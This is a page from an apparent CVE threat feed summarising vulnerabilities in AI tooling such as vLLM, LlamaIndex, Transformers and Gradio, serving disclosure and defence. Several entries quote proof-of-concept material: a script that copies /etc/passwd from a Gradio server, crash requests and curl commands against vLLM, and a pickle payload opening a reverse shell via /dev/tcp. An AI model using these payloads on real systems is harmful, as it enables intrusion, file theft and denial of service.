Threat Intelligence

Live CVE feed

299 threats tracked across 7 launch stacks — sourced from NVD, GHSA, CISA KEV, OSV, npm Audit, and EPSS.

299threats · All threats· page 6/15
Get guardrails →

LlamaIndex vulnerable to Path Traversal attack through its encode_image function

A path traversal vulnerability exists in run-llama/llama_index versions 0.11.23 through 0.12.40, specifically within the encode_image function in generic_utils.py. This vulnerability allows an attacker to manipulate the image_path input to read arbitrary files on the server, including sensitive system files. The issue arises due to improper validation or sanitization of the file path, enabling path traversal sequences to access files outside the intended directory. The vulnerability is fixed in version 0.12.41.

2 rules

LlamaIndex vulnerable to DoS attack through uncontrolled recursive JSON parsing

The JSONReader in run-llama/llama_index versions 0.12.28 is vulnerable to a stack overflow due to uncontrolled recursive JSON parsing. This vulnerability allows attackers to trigger a Denial of Service (DoS) by submitting deeply nested JSON structures, leading to a RecursionError and crashing applications. The root cause is the unsafe recursive traversal design and lack of depth validation, which makes the JSONReader susceptible to stack overflow when processing deeply nested JSON. This impacts the availability of services, making them unreliable and disrupting workflows. The issue is resolved in version 0.12.38.

2 rules

Transformers vulnerable to ReDoS attack through its get_imports() function

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the get_imports() function within dynamic_module_utils.py. This vulnerability affects versions 4.49.0 and is fixed in version 4.51.0. The issue arises from a regular expression pattern \stry\s:.?except.?: used to filter out try/except blocks from Python code, which can be exploited to cause excessive CPU consumption through crafted input strings due to catastrophic backtracking. This vulnerability can lead to remote code loading disruption, resource exhaustion in model serving, supply chain attack vectors, and development pipeline disruption.

2 rules

Transformers's ReDoS vulnerability in get_configuration_file can lead to catastrophic backtracking

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the get_configuration_file() function within the transformers.configuration_utils module. The affected version is 4.49.0, and the issue is resolved in version 4.51.0. The vulnerability arises from the use of a regular expression pattern config\.(.*)\.json that can be exploited to cause excessive CPU consumption through crafted input strings, leading to catastrophic backtracking. This can result in model serving disruption, resource exhaustion, and increased latency in applications using the library.

Transformers vulnerable to ReDoS attack through its SETTING_RE variable

A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the huggingface/transformers repository, specifically in version 4.49.0. The vulnerability is due to inefficient regular expression complexity in the SETTING_RE variable within the transformers/commands/chat.py file. The regex contains repetition groups and non-optimized quantifiers, leading to exponential backtracking when processing 'almost matching' payloads. This can degrade application performance and potentially result in a denial-of-service (DoS) when handling specially crafted input strings. The issue is fixed in version 4.51.0.

LlamaIndex has Incomplete Documentation of Program Execution related to JsonPickleSerializer component

Incomplete Documentation of Program Execution exists in the run-llama/llama_index library's JsonPickleSerializer component, affecting versions v0.12.27 through v0.12.40. This vulnerability allows remote code execution due to an insecure fallback to Python's pickle module. JsonPickleSerializer prioritizes deserialization using pickle.loads(), which can execute arbitrary code when processing untrusted data. Attackers can exploit this by crafting malicious payloads to achieve full system compromise. The root cause involves the use of an insecure fallback strategy without sufficient input validation or protective safeguards. Version 0.12.41 renames JsonPickleSerializer to PickleSerializer and adds a warning to the docs to only use PickleSerializer to deserialize safe things.

Next.JS vulnerability can lead to DoS via cache poisoning

Summary A vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition. Under certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page More details: CVE-2025-49826 Credits Allam Rachid zhero; Allam Yasser (inzo)

LangChain Community SSRF vulnerability exists in RequestsToolkit component

A Server-Side Request Forgery (SSRF) vulnerability exists in the RequestsToolkit component of the langchain-community package (specifically, langchain_community.agent_toolkits.openapi.toolkit.RequestsToolkit) in langchain-ai/langchain version 0.0.27. This vulnerability occurs because the toolkit does not enforce restrictions on requests to remote internet addresses, allowing it to also access local addresses. As a result, an attacker could exploit this flaw to perform port scans, access local services, retrieve instance metadata from cloud environments (e.g., Azure, AWS), and interact with servers on the local network. This issue has been fixed in version 0.0.28.

OWASP A10LLM02 · Insecure OutputOWASP LLM
Get guardrail →
2 rules

llama_index vulnerable to SQL Injection

Multiple vector store integrations in run-llama/llama_index version v0.12.21 have SQL injection vulnerabilities. These vulnerabilities allow an attacker to read and write data using SQL, potentially leading to unauthorized access to data of other users depending on the usage of the llama-index library in a web application.

OWASP A03OWASP LLM
Get guardrail →

Gradio Allows Unauthorized File Copy via Path Manipulation

An arbitrary file copy vulnerability in Gradio's flagging feature allows unauthenticated attackers to copy any readable file from the server's filesystem. While attackers can't read these copied files, they can cause DoS by copying large files (like /dev/urandom) to fill disk space. Description The flagging component doesn't properly validate file paths before copying files. Attackers can send specially crafted requests to the /gradio_api/run/predict endpoint to trigger these file copies. Source: User-controlled path parameter in the flagging functionality JSON payload Sink: shutil.copy operation in FileData._copy_to_dir() method The vulnerable code flow: 1. A JSON payload is sent to the /gradio_api/run/predict endpoint 2. The path field within FileData object can reference any file on the system 3. When processing this request, the Component.flag() method creates a GradioDataModel object 4. The FileData._copy_to_dir() method uses this path without proper validation: ``python def _copy_to_dir(self, dir: str) -> FileData: pathlib.Path(dir).mkdir(exist_ok=True) new_obj = dict(self) if not self.path: raise ValueError("Source file path is not set") new_name = shutil.copy(self.path, dir) # vulnerable sink new_obj["path"] = new_name return self.__class__(**new_obj) ` 5. The lack of validation allows copying any file the Gradio process can read PoC The following script demonstrates the vulnerability by copying /etc/passwd from the server to Gradio's flagged directory: Setup a Gradio app: `python import gradio as gr def image_classifier(inp): return {'cat': 0.2, 'dog': 0.8} test = gr.Interface(fn=image_classifier, inputs="image", outputs="label") test.launch(share=True) ` Run the PoC: `python import requests url = "https://[your-gradio-app-url]/gradio_api/run/predict" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" } payload = { "data": [ { "path": "/etc/passwd", "url": "[your-gradio-app-url]", "orig_name": "network_config", "size": 5000, "mime_type": "text/plain", "meta": { "_type": "gradio.FileData" } }, {} ], "event_data": None, "fn_index": 4, "trigger_id": 11, "session_hash": "test123" } response = requests.post(url, headers=headers, json=payload) print(f"Status Code: {response.status_code}") print(f"Response Body: {response.text}") ``

OWASP A04OWASP LLM
Get guardrail →

vLLM Tool Schema allows DoS via Malformed pattern and type Fields

Summary The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted. Details The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error: RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing" The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors. For example, the following inputs will crash the worker: Unclosed {, [, or ( Closed:{} and [] Here are some of runtime errors on the crash depending on what gets injected: RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed. RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count. RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed. PoC Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for: POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 579 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive { "model": "mistral-nemo-instruct", "messages": [{ "role": "user", "content": "crash via type" }], "tools": [ { "type": "function", "function": { "name": "crash01", "parameters": { "type": "object", "properties": { "a": { "type": "something" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash01", "arguments": { "a": "test" } } }, "stream": false, "max_tokens": 1 } Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to a RCE payload, it could have just been set to {{}}. I was not able to get RCE in my testing, but is does crash the worker. POST /v1/chat/completions HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: Content-Type: application/json Content-Length: 718 Origin: Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=0 Te: trailers Connection: keep-alive { "model": "mistral-nemo-instruct", "messages": [ { "role": "user", "content": "Crash via Pattern" } ], "tools": [ { "type": "function", "function": { "name": "crash02", "parameters": { "type": "object", "properties": { "a": { "type": "string", "pattern": "{{ __import__('os').system('echo RCE_OK > /tmp/pwned') or 'SAFE' }}" } } } } } ], "tool_choice": { "type": "function", "function": { "name": "crash02" } }, "stream": false, "max_tokens": 32, "temperature": 0.2, "top_p": 1, "n": 1 } Impact Backend workers can be crashed causing anyone to using the inference engine to get 500 internal server errors on subsequent requests. Fix https://github.com/vllm-project/vllm/pull/17623

OWASP A03LLM01 · Prompt InjectionOWASP LLM
Get guardrail →

vLLM allows clients to crash the openai server with invalid regex

Impact A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema. Issue with more details: https://github.com/vllm-project/vllm/issues/17313 Patches https://github.com/vllm-project/vllm/pull/17623

vLLM DOS: Remotely kill vllm over http with invalid JSON schema

Summary Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server Details The following API call (venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' will provoke a Uncaught exceptions from xgrammer in ./lib64/python3.11/site-packages/xgrammar/compiler.py Issue with more information: https://github.com/vllm-project/vllm/issues/17248 PoC Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}} curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}' Impact vllm crashes example traceback `` ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last): ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core ERROR 03-26 17:25:01 [core.py:340] engine_core.run_busy_loop() ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop ERROR 03-26 17:25:01 [core.py:340] outputs = step_fn() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step ERROR 03-26 17:25:01 [core.py:340] scheduler_output = self.scheduler.schedule() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule ERROR 03-26 17:25:01 [core.py:340] if structured_output_req and structured_output_req.grammar: ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar ERROR 03-26 17:25:01 [core.py:340] completed = self._check_grammar_completion() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion ERROR 03-26 17:25:01 [core.py:340] self._grammar = self._grammar.result(timeout=0.0001) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result ERROR 03-26 17:25:01 [core.py:340] return self.__get_result() ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result ERROR 03-26 17:25:01 [core.py:340] raise self._exception ERROR 03-26 17:25:01 [core.py:340] File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run ERROR 03-26 17:25:01 [core.py:340] result = self.fn(self.args, self.kwargs) ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar ERROR 03-26 17:25:01 [core.py:340] ctx = self.compiler.compile_json_schema(grammar_spec, ERROR 03-26 17:25:01 [core.py:340] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ERROR 03-26 17:25:01 [core.py:340] File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema ERROR 03-26 17:25:01 [core.py:340] self._handle.compile_json_schema( ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool ERROR 03-26 17:25:01 [core.py:340] ERROR 03-26 17:25:01 [core.py:340] CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue. `` Fix https://github.com/vllm-project/vllm/pull/17623

vLLM has a Weakness in MultiModalHasher Image Hashing Implementation

Summary In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks. Details Affected file: vllm/multimodal/hasher.py Affected method: MultiModalHasher.serialize_item https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35 Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing. Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata. Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in: Incorrect cache hits, leading to abnormal responses Deliberate construction of images with different meanings but the same hash value Recommendation In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage. Summary: Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images. Impact for other modalities For the influence of other modalities, since the video modality is transformed into a multi-dimensional array containing the length, width, time, etc. of the video, the same problem exists due to the incorrect sequence of numpy as well. For audio, since the momo function is not enabled in librosa.load, the loaded audio is automatically encoded into single channels by librosa and returns a one-dimensional array of numpy, thus keeping the structure of numpy fixed and not affected by this issue. Fixes https://github.com/vllm-project/vllm/pull/17378

vLLM has a Regular Expression Denial of Service (ReDoS, Exponential Complexity) Vulnerability in `pythonic_tool_parser.py`

Summary A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable. Details The following regular expression is used to match tool/function call patterns: `` r"\[([a-zA-Z]+\w\(([a-zA-Z]+\w=.,\s)([a-zA-Z]+\w=.\s)?\),\s)([a-zA-Z]+\w\(([a-zA-Z]+\w=.,\s)([a-zA-Z]+\w=.\s)?\)\s)+\]" ` This pattern contains multiple nested quantifiers (, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking. Attack Example: A malicious input such as ` [A(A= )A(A=, )A(A=, )A(A=, )... (repeated dozens of times) ...] or "[A(A=" + "\t)A(A=,\t" repeat ` can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS). Proof of Concept: A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt. ` Length: 22, Time: 0.0000 seconds, Match: False Length: 38, Time: 0.0010 seconds, Match: False Length: 54, Time: 0.0250 seconds, Match: False Length: 70, Time: 0.5185 seconds, Match: False Length: 86, Time: 13.2703 seconds, Match: False Length: 102, Time: 319.0717 seconds, Match: False `` Impact Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable. Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability. Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated. Fix https://github.com/vllm-project/vllm/pull/18454 Note that while this change has significantly improved performance, this regex may still be problematic. It has gone from exponential time complexity, O(2^N), to O(N^2).

2 rules

vLLM Allows Remote Code Execution via PyNcclPipe Communication Service

Impacted Environments This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected. Summary vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.​ A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges. The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface. This issue was reported privately to PyTorch and they determined that this behavior was intentional. Details The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution. 1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched: ``python from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe from vllm.config import KVTransferConfig config=KVTransferConfig( kv_ip="0.0.0.0", kv_port=18888, kv_rank=0, kv_parallel_size=1, kv_buffer_size=1024, kv_buffer_device="cpu" ) p=PyNcclPipe(config=config,local_rank=0) p.recv_tensor() # Receive data ` 2. The attacker crafts malicious packets and sends them to the PyNcclPipe service: `python from vllm.distributed.utils import StatelessProcessGroup class Evil: def __reduce__(self): import os cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"' return (os.system,(cmd,)) client = StatelessProcessGroup.create( host='172.17.0.1', port=18888, rank=1, world_size=2, ) client.send_obj(obj=Evil(),dst=0) ` The call stack triggering ​RCE is as follows: ` vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl -> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata -> vllm.distributed.utils.StatelessProcessGroup.recv_obj -> pickle.loads ` Getshell as follows: !image Reporters This issue was reported independently by three different parties: @kikayli (Zhuque Lab, Tencent) @omjeki Russell Bryant (@russellb) Fix https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the TCPStore` socket to the private interface as configured.

OWASP A08LLM05 · Supply ChainOWASP LLM
Get guardrail →

Hugging Face Transformers Regular Expression Denial of Service

A Regular Expression Denial of Service (ReDoS) exists in the preprocess_string() function of the transformers.testing_utils module. In versions before 4.50.0, the regex used to process code blocks in docstrings contains nested quantifiers that can trigger catastrophic backtracking when given inputs with many newline characters. An attacker who can supply such input to preprocess_string() (or code paths that call it) can force excessive CPU usage and degrade availability. Fix: released in 4.50.0, which rewrites the regex to avoid the inefficient pattern. ([GitHub][1]) Affected: < 4.50.0 Patched: 4.50.0

LlamaIndex Vulnerable to Denial of Service (DoS)

A Denial of Service (DoS) vulnerability has been identified in the KnowledgeBaseWebReader class of the run-llama/llama_index project, affecting version ~ latest(v0.12.15). The vulnerability arises due to inappropriate secure coding measures, specifically the lack of proper implementation of the max_depth parameter in the get_article_urls function. This allows an attacker to exhaust Python's recursion limit through repeated function calls, leading to resource consumption and ultimately crashing the Python process.

OWASP A06LLM04 · Model DoSOWASP LLM
Get guardrail →

Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration

Affected Environments Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead we recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue. Impact In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a SUB ZeroMQ socket and connect to an XPUB socket on the primary vLLM host. https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301 When data is received on this SUB socket, it is deserialized with pickle. This is unsafe, as it can be abused to execute code on a remote machine. https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470 Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.

OWASP A08LLM05 · Supply ChainOWASP LLM
Get guardrail →

phi4mm: Quadratic Time Complexity in Input Token Processing​ leads to denial of service

Summary A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs. Details ​​Affected Component​​: input_processor_for_phi4mm function. https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197 The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios. PoC Test data demonstrates exponential time growth: ``python test_cases = [100, 200, 400, 800, 1600, 3200, 6400] run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854] # seconds ` Doubling input size increases runtime by ~4x (consistent with O(n²)). Impact ​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion. Example: 10,000 placeholders → ~100 million operations. Remediation Recommendations​ Precompute all placeholder positions and expansion lengths upfront. Replace dynamic list concatenation with a single preallocated array. `python Pseudocode for O(n) solution new_input_ids = [] for token in input_ids: if token is placeholder: new_input_ids.extend([token] * precomputed_length) else: new_input_ids.append(token) ``

Showing 101120 of 299 threats